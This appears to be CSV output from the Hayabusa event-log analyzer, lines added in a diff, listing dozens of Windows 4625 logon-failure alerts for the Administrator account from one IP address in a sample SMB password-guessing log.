+2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fvVUozD2RuIchN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP3rghcrgas3l3q1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MMtcQYoVoM57gTcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFjTWECEep09Abjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jUlguy8tKBo4DSUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GETwMERLpiVtMRkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhas9Vjc193EVcOg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmVAnxq39t7qbcEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13y2nnltjipwZqth | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDQrPBL1VodIcQLR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0Mp4jXeHd3b0CLw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3j89GmIDnG4v7JJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyRLZMoaXJUrPPfn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcoyOKUjEi1uCSpD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWQGVJLcVwgf4YJ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrFqG85mmjTYJ4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DqIh1QHTk470nrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feVbA94p6iT2pBeC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T30YHcE8ZG7FaxW7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaKHRwYtx2lGtOCG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDEDuMmlDZZfdkFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CObqGJQi1hOOI83J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhsE9bQeEwW21bAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: El1qxgjvGS0QSS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vtlr3HwzJcAfSxuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDayr44iXmE63vqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkNoLVOhnS8ayujK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3ggg78jjziKqijrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BodeSVqeqa5qBQDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yY7yxEcuGwWSJZV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oTlg6cvsz6Z6QpCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3pTALzqu4Ok6CUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdGagQIEcvQQMp4n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVu4reOyQEIkChHO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EJWNS69MmMGLSnHc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPaR2sBxPPCjxpL0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kJJ9A1EfqM4V2TRv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dxf59xjpxO3oG17 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dMI12g4tjSF8PX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZAqN0xPaW4jg2Kjc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mcnReyIEaqsQfowV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: akOH8Y7XdjOpqTez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b0HOK1TIqloud7gh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n6uIAK55BmTnA6Bf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDnn6QmLOJ6KwzKt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np8KaRJvRqBrGyFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dxbu69Amr6gWN5Hw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoZdaFJWNON8Ujnc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q4RSlXgOS7sssCqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2PJprE7olK4pjrx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQOAUcWQL32y2gGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXI0wWwzhHN0uvOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujGqTzfOhmKgoAjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cFoPtWZ03O3ZZgOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyO2VTnpGZLeSIvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ua69MEWABQ9hsooT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubPQWn4nQYr3rXr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xrgATdNqkA44nKqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKwktiUfTWakNx3I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVebPFnWhbZKIANs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IyV8stIvfXLJQpsn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uStfvm0y0eZrWONH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUwTyUXe8NLG7bCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HQuDp8aZpWDANKMe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQKTlzx2gq9ayAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tCzVponBvb9mbyIr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mSwnrFv90KjN2cqj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QX5TLs2MPkia1cmk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ammLKlG1Q5awQGvN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ1ijJjPJbF4uFlo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZOLnwIzpGz03Yjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xS8U3UQNz6l0LZn0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no6cftQ5MF1fjZ0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5WHS6jVRnCUH0Rb5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
